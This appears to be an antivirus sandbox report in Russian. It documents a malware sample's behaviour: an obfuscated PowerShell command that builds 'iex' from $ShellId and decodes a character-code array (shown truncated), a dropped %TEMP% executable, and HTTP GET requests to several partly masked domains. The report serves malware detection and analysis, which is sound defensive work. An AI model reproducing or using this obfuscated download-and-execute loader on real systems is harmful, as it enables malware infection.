Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' & ( $sHELlId[1]+$ShEllID[13]+'X')( [StRinG]::joiN( '' ,([CHaR[]] (62 , 116, 109 ,84 ,119 , 86,88 ,58,39, 58 , 116 ,127 ,109 ,55, 117,120,112, 127 ,121,110,58 ,104,123 , 116,126, 117,119, 33 ,62...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\34868.exe
Сетевая активность
Подключается к
- 'ip##e.com':80
- 'ip##e.com':443
- 'sc#.com.gt':80
- 'am###ngmike.net':80
- 'ge####lgauffin.se':80
TCP
Запросы HTTP GET
- http://www.ip##e.com/bgj7/
- http://sc#.com.gt/OrWf/
- http://am###ngmike.net/wbuK/
- http://ge####lgauffin.se/93uC/
Другие
- 'ip##e.com':443
UDP
- DNS ASK ip##e.com
- DNS ASK ju###click.com
- DNS ASK sc#.com.gt
- DNS ASK am###ngmike.net
- DNS ASK ge####lgauffin.se
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' & ( $sHELlId[1]+$ShEllID[13]+'X')( [StRinG]::joiN( '' ,([CHaR[]] (62 , 116, 109 ,84 ,119 , 86,88 ,58,39, 58 , 116 ,127 ,109 ,55, 117,120,112, 127 ,121,110,58 ,104,123 , 116,126, 117,119, 33 ,62...' (со скрытым окном)
